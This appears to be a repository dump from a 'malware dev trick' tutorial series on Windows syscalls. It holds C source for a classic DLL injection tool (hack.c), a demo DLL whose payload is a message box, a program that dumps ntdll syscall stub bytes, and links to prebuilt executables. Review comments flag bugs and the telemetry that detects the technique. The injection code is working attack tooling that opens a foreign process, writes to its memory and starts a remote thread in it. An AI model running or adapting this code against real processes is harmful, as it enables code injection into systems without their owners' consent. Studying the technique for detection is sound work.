├── evil.dll ├── hack.exe ├── hack2.exe ├── README.md ├── evil.c ├── hack2.c └── hack.c /evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2023-06-07-syscalls-1/HEAD/evil.dll -------------------------------------------------------------------------------- /hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2023-06-07-syscalls-1/HEAD/hack.exe -------------------------------------------------------------------------------- /hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/2023-06-07-syscalls-1/HEAD/hack2.exe -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 32. Syscalls - part 1. C++ malware implementation. 2 | 3 | Malware dev trick - part 32, intro to windows syscalls. C++ malware example. 
[https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html](https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html)
--------------------------------------------------------------------------------
/evil.c:
--------------------------------------------------------------------------------
/*
evil.c
simple DLL for DLL inject to process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/

/* NOTE(review): the header name was lost in extraction; MessageBox, HMODULE and
   the DLL_* reason codes come from <windows.h> -- confirm against the original file. */
#include
#pragma comment (lib, "user32.lib")

/*
 * DLL entry point. The only action is a MessageBox on DLL_PROCESS_ATTACH; the
 * other three reason codes are explicit no-ops and the function always returns TRUE.
 *
 * hModule    - module handle of this DLL (not used here)
 * nReason    - DLL_PROCESS_ATTACH / DLL_PROCESS_DETACH / DLL_THREAD_ATTACH / DLL_THREAD_DETACH
 * lpReserved - not used here
 *
 * Because the payload is only a visible message box, this DLL serves as a
 * harmless marker when exercising injection detection in a lab: a message box
 * appearing inside a process that never calls MessageBox is the observable.
 *
 * NOTE(review): DllMain runs under the loader lock, and Microsoft's DllMain
 * guidance advises against calling into DLLs other than kernel32 (user32 here)
 * from it. Tolerable for a demo, a pattern to avoid in real DLLs.
 */
BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
    switch (nReason) {
    case DLL_PROCESS_ATTACH:
        MessageBox(
            NULL,
            "Meow-meow!",
            "=^..^=",
            MB_OK
        );
        break;
    case DLL_PROCESS_DETACH:
        break;
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    /* no default: any other reason code simply reaches the TRUE return below */
    }
    return TRUE;
}
--------------------------------------------------------------------------------
/hack2.c:
--------------------------------------------------------------------------------
/*
hack2.c
print syscall ID from stub
author: @cocomelonc
https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html
*/
/* NOTE(review): header names were lost in extraction; the code below needs
   <windows.h> (LoadLibraryExA, GetProcAddress, FreeLibrary, BYTE) and <stdio.h>
   (printf) -- confirm against the original file. */
#include
#include

/*
 * Resolve an export of ntdll.dll by name and dump the first 23 bytes of its
 * machine code to stdout, one "%02X " field per byte.
 *
 * funcName - NUL-terminated export name (never modified; could be const char *)
 *
 * Prints a message and returns early if ntdll.dll cannot be loaded or the
 * export is not found; otherwise prints "address of <name>: 0x<addr>", then
 * the byte dump, then releases the module reference taken by LoadLibraryExA.
 *
 * Reading the in-memory prologue of an Nt* export is comparable to the stub
 * integrity checks some EDR products perform: the bytes printed are whatever
 * is currently mapped in this process, patched or not.
 */
void printSyscallStub(char* funcName) {
    /* NOTE(review): ntdll.dll is already mapped into every Win32 process, so this
       presumably returns the existing module handle (with its reference count
       bumped) and DONT_RESOLVE_DLL_REFERENCES has no extra effect -- confirm. */
    HMODULE ntdll = LoadLibraryExA("ntdll.dll", NULL, DONT_RESOLVE_DLL_REFERENCES);

    if (ntdll == NULL) {
        printf("failed to load ntdll.dll\n");
        return;
    }

    FARPROC funcAddress = GetProcAddress(ntdll, funcName);

    if (funcAddress == NULL) {
        printf("failed to get address of %s\n", funcName);
        FreeLibrary(ntdll);   /* drop the reference taken above before bailing out */
        return;
    }

    /* NOTE(review): %p expects a void *; passing a FARPROC works on Windows but
       is not strictly conforming C. */
    printf("address of %s: 0x%p\n", funcName, funcAddress);

    // print the first 23 bytes of the stub
    /* NOTE(review): 23 is a magic number -- presumably the author's chosen length
       for an x64 ntdll stub; nothing here derives or validates it. */
    BYTE* bytes = (BYTE*)funcAddress;
    for (int i = 0; i < 23; i++) {
        printf("%02X ", bytes[i]);
    }
    printf("\n");

    FreeLibrary(ntdll);
}

/*
 * Entry point: dump the NtAllocateVirtualMemory stub and exit with 0.
 * NOTE(review): "int main()" is an old-style non-prototype declaration in C;
 * "int main(void)" is the conforming form.
 */
int main() {
    printSyscallStub("NtAllocateVirtualMemory");
    return 0;
}

--------------------------------------------------------------------------------
/hack.c:
--------------------------------------------------------------------------------
/*
hack.c
classic DLL injection example
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/
/* NOTE(review): the four header names were lost in extraction; the code below
   needs at least <windows.h>, <stdio.h> and <stdlib.h> (atoi) -- confirm. */
#include
#include
#include
#include

#pragma comment(lib, "ntdll")

/*
 * Local prototype for the ntdll export NtAllocateVirtualMemory, which main()
 * resolves at run time with GetProcAddress.
 *
 * NOTE(review): the prototype in the public Windows headers (winternl.h/ntifs.h)
 * declares ZeroBits as ULONG_PTR and RegionSize as PSIZE_T. With the ULONG/PULONG
 * declared here, a 64-bit build hands the callee a pointer to a 4-byte object
 * where it expects an 8-byte one -- see the (PULONG)&evilLen cast in main().
 */
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG ZeroBits,
    PULONG RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

/* Path written into the target process and passed to LoadLibraryA there. */
char evilDLL[] = "C:\\temp\\evil.dll";
/* NOTE(review): sizeof(evilDLL) already counts the terminating NUL, so the +1
   makes the WriteProcessMemory call below read one byte past the end of evilDLL. */
unsigned int evilLen = sizeof(evilDLL) + 1;

/*
 * Classic DLL injection: open the process named by argv[1], allocate an RWX
 * buffer in it, write the DLL path there and start a remote thread at
 * LoadLibraryA with that buffer as its argument.
 *
 * argv[1] - target PID as a decimal string. Returns -1 when atoi() yields 0,
 *           otherwise 0; no Win32/NT call result is checked along the way.
 *
 * Detection note: the only difference from the commented-out VirtualAllocEx
 * call is that the allocation goes directly to ntdll's exported
 * NtAllocateVirtualMemory. That is still a call through ntdll's stub, and the
 * rest of the chain -- OpenProcess(PROCESS_ALL_ACCESS) on a foreign PID, a
 * PAGE_EXECUTE_READWRITE allocation, WriteProcessMemory, CreateRemoteThread on
 * LoadLibraryA -- is the textbook remote-thread injection sequence that
 * process-access and remote-thread telemetry (e.g. Sysmon event IDs 10 and 8)
 * records unchanged.
 */
int main(int argc, char* argv[]) {
    HANDLE ph; // process handle
    HANDLE rt; // remote thread
    LPVOID rb; // remote buffer   NOTE(review): passed uninitialised as *BaseAddress below

    // handle to kernel32 and pass it to GetProcAddress
    HMODULE hKernel32 = GetModuleHandle("Kernel32");
    HMODULE ntdll = GetModuleHandle("ntdll");
    VOID *lb = GetProcAddress(hKernel32, "LoadLibraryA");

    // parse process ID
    /* NOTE(review): argc is never checked, so running without an argument
       dereferences argv[1] == NULL; atoi() also cannot distinguish "0" from a
       non-numeric string. */
    if ( atoi(argv[1]) == 0) {
        printf("PID not found :( exiting...\n");
        return -1;
    }
    printf("PID: %i", atoi(argv[1]));
    /* NOTE(review): DWORD(...) is C++ functional-cast syntax, so despite the .c
       name this file only builds as C++ (the README calls it a C++ example). */
    ph = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));

    // allocate memory buffer for remote process
    // rb = VirtualAllocEx(ph, NULL, evilLen, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);

    pNtAllocateVirtualMemory myNtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetProcAddress(ntdll, "NtAllocateVirtualMemory");

    // allocate memory buffer for remote process
    /* NOTE(review): the NTSTATUS is discarded, and &evilLen points at a 4-byte
       object while the documented RegionSize parameter is a SIZE_T (see typedef). */
    myNtAllocateVirtualMemory(ph, &rb, 0, (PULONG)&evilLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // "copy" evil DLL between processes
    WriteProcessMemory(ph, rb, evilDLL, evilLen, NULL);

    // our process start new thread
    rt = CreateRemoteThread(ph, NULL, 0, (LPTHREAD_START_ROUTINE)lb, rb, 0, NULL);
    /* NOTE(review): rt is never closed -- the thread handle leaks until process exit. */
    CloseHandle(ph);
    return 0;
}

--------------------------------------------------------------------------------